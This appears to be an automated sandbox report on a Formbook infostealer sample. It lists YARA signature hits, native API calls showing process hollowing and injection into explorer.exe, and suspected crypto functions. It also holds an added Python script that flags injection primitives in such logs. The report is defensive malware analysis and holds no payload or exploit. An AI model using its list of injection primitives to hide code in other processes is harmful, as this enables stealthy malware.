Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00458784 NtdllDefWindowProc_A, 0_2_00458784
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0043D6BC NtdllDefWindowProc_A,GetCapture, 0_2_0043D6BC
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00458F00 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 0_2_00458F00
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00458FB0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 0_2_00458FB0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0044D1BC GetSubMenu,SaveDC,RestoreDC,731EB080,SaveDC,RestoreDC,NtdllDefWindowProc_A, 0_2_0044D1BC
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00419CA0 NtCreateFile, 1_2_00419CA0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00419D50 NtReadFile, 1_2_00419D50
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00419DD0 NtClose, 1_2_00419DD0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00419E80 NtAllocateVirtualMemory, 1_2_00419E80
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00419C9A NtCreateFile, 1_2_00419C9A
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A398F0 NtReadVirtualMemory,LdrInitializeThunk, 1_2_00A398F0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39860 NtQuerySystemInformation,LdrInitializeThunk, 1_2_00A39860
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39840 NtDelayExecution,LdrInitializeThunk, 1_2_00A39840
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A399A0 NtCreateSection,LdrInitializeThunk, 1_2_00A399A0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39910 NtAdjustPrivilegesToken,LdrInitializeThunk, 1_2_00A39910
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39A20 NtResumeThread,LdrInitializeThunk, 1_2_00A39A20
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39A00 NtProtectVirtualMemory,LdrInitializeThunk, 1_2_00A39A00
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39A50 NtCreateFile,LdrInitializeThunk, 1_2_00A39A50
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A395D0 NtClose,LdrInitializeThunk, 1_2_00A395D0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39540 NtReadFile,LdrInitializeThunk, 1_2_00A39540
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A396E0 NtFreeVirtualMemory,LdrInitializeThunk, 1_2_00A396E0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39660 NtAllocateVirtualMemory,LdrInitializeThunk, 1_2_00A39660
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A397A0 NtUnmapViewOfSection,LdrInitializeThunk, 1_2_00A397A0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39780 NtMapViewOfSection,LdrInitializeThunk, 1_2_00A39780
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39710 NtQueryInformationToken,LdrInitializeThunk, 1_2_00A39710
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A398A0 NtWriteVirtualMemory, 1_2_00A398A0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39820 NtEnumerateKey, 1_2_00A39820
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A3B040 NtSuspendThread, 1_2_00A3B040
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A399D0 NtCreateProcessEx, 1_2_00A399D0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39950 NtQueueApcThread, 1_2_00A39950
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39A80 NtOpenDirectoryObject, 1_2_00A39A80
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39A10 NtQuerySection, 1_2_00A39A10
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A3A3B0 NtGetContextThread, 1_2_00A3A3B0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39B00 NtSetValueKey, 1_2_00A39B00
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A395F0 NtQueryInformationFile, 1_2_00A395F0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39520 NtWaitForSingleObject, 1_2_00A39520
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A3AD30 NtSetContextThread, 1_2_00A3AD30
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39560 NtWriteFile, 1_2_00A39560
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A396D0 NtCreateKey, 1_2_00A396D0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39610 NtEnumerateValueKey, 1_2_00A39610
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39670 NtQueryInformationProcess, 1_2_00A39670
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39650 NtQueryValueKey, 1_2_00A39650
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39FE0 NtCreateMutant, 1_2_00A39FE0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39730 NtQueryVirtualMemory, 1_2_00A39730
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A3A710 NtOpenProcessToken, 1_2_00A3A710
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39760 NtOpenProcess, 1_2_00A39760
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39770 NtSetInformationFile, 1_2_00A39770
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A3A770 NtOpenThread, 1_2_00A3A770
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_1_00419CA0 NtCreateFile, 1_1_00419CA0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_1_00419D50 NtReadFile, 1_1_00419D50
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_1_00419DD0 NtClose, 1_1_00419DD0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869840 NtDelayExecution,LdrInitializeThunk, 5_2_04869840
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869860 NtQuerySystemInformation,LdrInitializeThunk, 5_2_04869860
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048699A0 NtCreateSection,LdrInitializeThunk, 5_2_048699A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048695D0 NtClose,LdrInitializeThunk, 5_2_048695D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869910 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_04869910
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869540 NtReadFile,LdrInitializeThunk, 5_2_04869540
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869560 NtWriteFile,LdrInitializeThunk, 5_2_04869560
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048696D0 NtCreateKey,LdrInitializeThunk, 5_2_048696D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048696E0 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_048696E0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869610 NtEnumerateValueKey,LdrInitializeThunk, 5_2_04869610
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869650 NtQueryValueKey,LdrInitializeThunk, 5_2_04869650
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869A50 NtCreateFile,LdrInitializeThunk, 5_2_04869A50
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869660 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_04869660
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869780 NtMapViewOfSection,LdrInitializeThunk, 5_2_04869780
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869FE0 NtCreateMutant,LdrInitializeThunk, 5_2_04869FE0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869B00 NtSetValueKey,LdrInitializeThunk, 5_2_04869B00
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869710 NtQueryInformationToken,LdrInitializeThunk, 5_2_04869710
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869770 NtSetInformationFile,LdrInitializeThunk, 5_2_04869770
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048698A0 NtWriteVirtualMemory, 5_2_048698A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048698F0 NtReadVirtualMemory, 5_2_048698F0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869820 NtEnumerateKey, 5_2_04869820
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0486B040 NtSuspendThread, 5_2_0486B040
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048699D0 NtCreateProcessEx, 5_2_048699D0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048695F0 NtQueryInformationFile, 5_2_048695F0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869520 NtWaitForSingleObject, 5_2_04869520
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0486AD30 NtSetContextThread, 5_2_0486AD30
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869950 NtQueueApcThread, 5_2_04869950
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869A80 NtOpenDirectoryObject, 5_2_04869A80
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869A00 NtProtectVirtualMemory, 5_2_04869A00
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869A10 NtQuerySection, 5_2_04869A10
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869A20 NtResumeThread, 5_2_04869A20
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869670 NtQueryInformationProcess, 5_2_04869670
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048697A0 NtUnmapViewOfSection, 5_2_048697A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0486A3B0 NtGetContextThread, 5_2_0486A3B0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0486A710 NtOpenProcessToken, 5_2_0486A710
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869730 NtQueryVirtualMemory, 5_2_04869730
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869760 NtOpenProcess, 5_2_04869760
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0486A770 NtOpenThread, 5_2_0486A770
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00239CA0 NtCreateFile, 5_2_00239CA0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00239D50 NtReadFile, 5_2_00239D50
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00239DD0 NtClose, 5_2_00239DD0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00239E80 NtAllocateVirtualMemory, 5_2_00239E80
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00239C9A NtCreateFile, 5_2_00239C9A
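The native-call list above is long, and the signal in it is which process holds the full process-hollowing and thread-injection set (NtCreateSection/NtMapViewOfSection/NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread/NtResumeThread, NtQueueApcThread, NtCreateProcessEx). The script below is an added example, not part of this report or of Joe Sandbox: it parses evidence lines of exactly this format, groups genuine ntdll Nt* stubs per process, and flags processes that cover enough of those primitives. It assumes the function id reads as process index, dump index, address; the sample input is a subset of the lines copied from this block.

```python
import re
from collections import defaultdict

# One "Code function" evidence line from this report looks like:
#   Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A399A0 NtCreateSection,LdrInitializeThunk, 1_2_00A399A0
# The function id is read here as <process index>_<dump index>_<virtual address>;
# that reading is an assumption, the report does not document the fields.
LINE_RE = re.compile(
    r"^Source: (?P<proc>\S+) Code function: "
    r"(?P<fid>(?P<pidx>\d+)_(?P<dump>\d+)_(?P<addr>[0-9A-Fa-f]+))"
    r"(?P<apis>.*?)\s*(?P=fid)$"
)

# Native calls that, taken together, implement process hollowing and
# thread/APC injection (the techniques this report flags for the sample).
INJECTION_APIS = frozenset({
    "NtCreateProcessEx", "NtCreateSection", "NtMapViewOfSection",
    "NtUnmapViewOfSection", "NtWriteVirtualMemory", "NtProtectVirtualMemory",
    "NtGetContextThread", "NtSetContextThread", "NtResumeThread",
    "NtQueueApcThread",
})


def parse_native_calls(lines):
    """Return {(process path, process index): set of Nt* syscall stubs}."""
    calls = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        key = (m.group("proc"), int(m.group("pidx")))
        for token in m.group("apis").split(","):
            token = token.strip()
            # Keep genuine ntdll exports (NtXxx). This drops raw addresses such
            # as 731EB080 and the user32 forwarder NtdllDefWindowProc_A, which
            # the report lists under the same heading but is not a syscall.
            if re.fullmatch(r"Nt[A-Z]\w*", token):
                calls[key].add(token)
    return dict(calls)


def injection_indicators(lines, threshold=5):
    """List (process path, process index, primitives seen) for every process
    whose native-call set covers at least `threshold` injection primitives."""
    hits = []
    for key, apis in sorted(parse_native_calls(lines).items()):
        seen = sorted(apis & INJECTION_APIS)
        if len(seen) >= threshold:
            hits.append((key[0], key[1], seen))
    return hits


# Evidence lines copied from this report (a subset of the block above).
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00458784 NtdllDefWindowProc_A, 0_2_00458784",
    r"Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0044D1BC GetSubMenu,SaveDC,RestoreDC,731EB080,SaveDC,RestoreDC,NtdllDefWindowProc_A, 0_2_0044D1BC",
    r"Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00419CA0 NtCreateFile, 1_2_00419CA0",
    r"Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A399A0 NtCreateSection,LdrInitializeThunk, 1_2_00A399A0",
    r"Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39A20 NtResumeThread,LdrInitializeThunk, 1_2_00A39A20",
    r"Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A397A0 NtUnmapViewOfSection,LdrInitializeThunk, 1_2_00A397A0",
    r"Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39780 NtMapViewOfSection,LdrInitializeThunk, 1_2_00A39780",
    r"Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A398A0 NtWriteVirtualMemory, 1_2_00A398A0",
    r"Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A399D0 NtCreateProcessEx, 1_2_00A399D0",
    r"Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A39950 NtQueueApcThread, 1_2_00A39950",
    r"Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A3AD30 NtSetContextThread, 1_2_00A3AD30",
    r"Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00401026 1_2_00401026",
    r"Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048699A0 NtCreateSection,LdrInitializeThunk, 5_2_048699A0",
    r"Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869780 NtMapViewOfSection,LdrInitializeThunk, 5_2_04869780",
    r"Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048698A0 NtWriteVirtualMemory, 5_2_048698A0",
    r"Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0486AD30 NtSetContextThread, 5_2_0486AD30",
    r"Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869950 NtQueueApcThread, 5_2_04869950",
    r"Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04869A20 NtResumeThread, 5_2_04869A20",
    r"Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048697A0 NtUnmapViewOfSection, 5_2_048697A0",
]

if __name__ == "__main__":
    for proc, idx, seen in injection_indicators(SAMPLE_LINES):
        print(f"{proc} (process {idx}): {len(seen)} injection primitives: "
              f"{', '.join(seen)}")
```

On the sample lines the first R6o4qCis6s.exe instance (index 0) yields no Nt* stubs at all, because its only "Nt" entries are the user32 forwarder NtdllDefWindowProc_A; the second instance (index 1) and the explorer.exe process (index 5) both cross the threshold, which matches the report's own hollowing and APC-injection verdicts. The filter on the token shape is the part worth keeping: without it, GUI forwarders and stray addresses inflate the count and every Delphi-style GUI binary looks like an injector.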
Detected potential crypto function
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0040C340 0_2_0040C340
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_00452DE0 0_2_00452DE0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0044D1BC 0_2_0044D1BC
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 0_2_0046724C 0_2_0046724C
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00401026 1_2_00401026
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00401030 1_2_00401030
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041DA67 1_2_0041DA67
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041D4F2 1_2_0041D4F2
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041E4F7 1_2_0041E4F7
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041E4FA 1_2_0041E4FA
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00402D87 1_2_00402D87
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00402D90 1_2_00402D90
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00409E20 1_2_00409E20
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041CEE3 1_2_0041CEE3
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_0041E764 1_2_0041E764
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00402FB0 1_2_00402FB0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0B090 1_2_00A0B090
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AB1002 1_2_00AB1002
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A14120 1_2_00A14120
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009FF900 1_2_009FF900
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A2EBB0 1_2_00A2EBB0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0841F 1_2_00A0841F
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A0D5E0 1_2_00A0D5E0
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_009F0D20 1_2_009F0D20
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00AC1D55 1_2_00AC1D55
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: 1_2_00A16E30 1_2_00A16E30
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483B090 5_2_0483B090
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048520A0 5_2_048520A0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F20A8 5_2_048F20A8
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F28EC 5_2_048F28EC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048E1002 5_2_048E1002
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483841F 5_2_0483841F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048ED466 5_2_048ED466
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04852581 5_2_04852581
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F25DD 5_2_048F25DD
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0483D5E0 5_2_0483D5E0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0482F900 5_2_0482F900
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F2D07 5_2_048F2D07
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04820D20 5_2_04820D20
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04844120 5_2_04844120
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F1D55 5_2_048F1D55
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F22AE 5_2_048F22AE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F2EF7 5_2_048F2EF7
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_04846E30 5_2_04846E30
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0485EBB0 5_2_0485EBB0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048EDBD2 5_2_048EDBD2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F1FF1 5_2_048F1FF1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_048F2B28 5_2_048F2B28
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0023E4F7 5_2_0023E4F7
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_0023E4FA 5_2_0023E4FA
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00222D87 5_2_00222D87
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00222D90 5_2_00222D90
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00229E20 5_2_00229E20
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00222FB0 5_2_00222FB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 0482B150 appears 35 times
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: String function: 009FB150 appears 32 times
Source: C:\Users\user\Desktop\R6o4qCis6s.exe Code function: String function: 00406A94 appears 57 times
PE file contains strange resources
Source: R6o4qCis6s.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: R6o4qCis6s.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: R6o4qCis6s.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: R6o4qCis6s.exe, 00000000.00000002.213709670.0000000002250000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs R6o4qCis6s.exe
Source: R6o4qCis6s.exe, 00000001.00000002.257369887.0000000002ABE000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameEXPLORER.EXEj% vs R6o4qCis6s.exe
Source: R6o4qCis6s.exe, 00000001.00000002.256353514.0000000000AEF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs R6o4qCis6s.exe
Yara signature match
Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
